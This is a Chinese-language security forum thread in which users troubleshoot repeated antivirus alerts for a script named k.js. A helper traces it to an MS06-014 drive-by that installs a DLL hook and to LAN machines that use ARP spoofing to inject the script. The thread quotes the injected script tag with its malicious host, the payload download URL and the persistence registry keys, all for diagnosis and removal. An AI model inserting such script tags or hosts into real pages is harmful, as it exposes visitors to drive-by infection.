瑞星卡卡安全论坛

此问题同顶，而且我的注册表监控被禁用。变成小黄伞，重装或者修复都没有用

这里没有瑞星的工作人员。。
想解决问题还是扫个日志上来吧~

顶啊 平时那些高手都那里去了啊？

一打开网页就会出现这个,真搞不懂

总是弹出这个,这是因为在信息中心中的页面含有k.js这个文件连接

附件: 652609200767145156.jpg

Trojan.DL.JS.Agent.f

我的是这个病毒!但情况一样!!好郁闷!

引用:

【sharkbob的贴子】请瑞星技术人员速度出来 解决! 现在我们还怎么上网?! ………………

没有瑞星工作人员！

清空临时文件和IE缓存，还有问题扫SRE日志上来。！

可能瑞星倒闭了!!哎~~~买错软件了吗?

如果系统里暂时未被注入病毒，就得手工删除那里的文件。

不过先扫日志吧。

确定无异常，再用WinRAR进那些临时文件夹里手工删除。

早就试过多种方法了.

清空IE的所以信息,系统都重装了.

只要瑞星没有升级就没有事,一旦升级到最新版本.就报这个病毒!

而且任务调用IE内核的软件,肯定报这个病毒!

所以,估计最大的情况是,瑞星误报了!

把正常的脚本当成了病毒!

我们公司好多人都中了这个不知道是不是病毒的东西，打开网页，每个页面加载<script src="http://k.sb941.com/k.js" type="text/javascript"></script>，我用的windows2000也中了，整整搞了一天，杀毒，杀木马，重装系统都没用，只好在HOST表里把这个网站封了，还有几台XP系统也一样，晚上下班回家，第二天上班，莫名其妙就没了，其他电脑还是有这个病毒，本人用的不是瑞星，线路是电信，用IE和火狐浏览器都一样

我们单位也是这样,昨天发现这个东西有但过了不久又没有了,反复出现,今天一天都有

UP

本来想午睡的，看来这个情况是睡不了了。
该网页利用MS06-014漏洞，下载http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll，并直接写入注册表
HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
指向C:\WINDOWS\winhelp.dll

由于瑞星查杀了k.js，一般情况下大家是不会中毒的。但是之所以重复出现k.js的报毒，原因是：
局域网中有电脑中了此毒，然后向局域网中其他电脑发动ARP攻击，将其他用户接收到的网络数据包中加入
<script src="http://k.sb941.com/k.js" type="text/javascript"></script>
的代码，导致其他用户访问任何网站时都会报毒。

所以，首先，确认你的电脑是否中毒：
确认以下注册表路径是否存在：
[HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}]
如果存在，尝试在安全模式下删除这两个注册表路径。

如果不存在，说明不是你本机的中毒问题，而是你受到ARP攻击的缘故。
这种情况下，请联系局域网网管进行协调处理。必须找到中毒并进行ARP欺骗的电脑，然后将其断网查毒。

对于客户端上网流程和“网页挂马”的几种方式分析可参考
http://hi.baidu.com/litiejun/blog/item/049d703d4f64ffef3c6d9738.html
其中所提到的：
攻击点：1.在客户端（网民）主机或网络中发送攻击代码，比如ARP攻击，插入恶意代码，诱使用户访问攻击者指定的站点，这时会影响该客户端或其所在的网络
正是本帖用户所面临的情况。

如果找出中毒电脑不太可能的情况下

那我们自己电脑如何防止ARP攻击?
有没有好的办法?

原来是ARP，难怪今天怎么那么安稳，原来，我把那台中了ARP病毒的机器搞定了，害的我昨天拼命的重装系统

上www.ewido.com上把anti.spywarem免费下载下来，用它杀最好！

我都杀掉了，这个工具很好，瑞星找不出病毒，但这个工具可以找出来，设置成delete，然后执行下面的按钮，就全变成done，就好了

UP

有没有好的办法防止ARP病毒的攻击？？如在防火墙设置

去http://www.antiarp.com/下载arp防火墙，可以防止这个病毒。呵呵，我正在用，觉得还可以！

希望瑞星防火墙有防止arp病毒的功能

up
我的机子也有这样的情况。。但不是K。JS

是W[1]。JS。。。情况完全和你们说的一样。。

瑞星的技术人员是吃干饭的？
咋还不解决？？？？
这玩意快把人烦死了！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！！

我的机子也有这样的情况。。但不是K。JS
是W[1]。JS。。。情况完全和你们说的一样。。


前天中了这个病毒，卸载IE，安全模式下杀毒解决了。
昨天又中了，以上方法无效了，重装系统无效，以上各位提供的软件全部用过了，还是无效。到底该怎么解决阿，昨天折腾到3点，到底该怎么解决阿？

本病毒：Trojan.DL.VBS.Agent.cpb （文件名为k[1].js)老是在internet临时文件里出现，瑞星监控出杀了又来，如此反复着！我试图清空临时文件，但一上网打开网页（不管是哪些网页），那个k[1].js又会被瑞星监控到。

http://www.ccw.com.cn/soft/apply/htm2007/20070529_265239_3.shtml

引用:

【轩辕小聪的贴子】本来想午睡的，看来这个情况是睡不了了。 该网页利用MS06-014漏洞，下载http://day.91tg.net/xp.dll到C:\WINDOWS\winhelp.dll，并直接写入注册表 HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE} 指向C:\WINDOWS\winhelp.dll 由于瑞星查杀了k.js，一般情况下大家是不会中毒的。但是之所以重复出现k.js的报毒，原因是： 局域网中有电脑中了此毒，然后向局域网中其他电脑发动ARP攻击，将其他用户接收到的网络数据包中加入 <script src="http://k.sb941.com/k.js" type="text/javascript"></script> 的代码，导致其他用户访问任何网站时都会报毒。 所以，首先，确认你的电脑是否中毒： 确认以下注册表路径是否存在： [HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}] [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}] 如果存在，尝试在安全模式下删除这两个注册表路径。 如果不存在，说明不是你本机的中毒问题，而是你受到ARP攻击的缘故。 这种情况下，请联系局域网网管进行协调处理。必须找到中毒并进行ARP欺骗的电脑，然后将其断网查毒。 对于客户端上网流程和“网页挂马”的几种方式分析可参考 其中所提到的： 攻击点：1.在客户端（网民）主机或网络中发送攻击代码，比如ARP攻击，插入恶意代码，诱使用户访问攻击者指定的站点，这时会影响该客户端或其所在的网络 正是本帖用户所面临的情况。 ………………

这里是社区又不是瑞星技术支持部的论坛....
帮大家解决问题的都是热心的网友.说扫SRG日志咋没一个人扫了发上来大家看看呢？
电脑的问题不是光说就能说明白的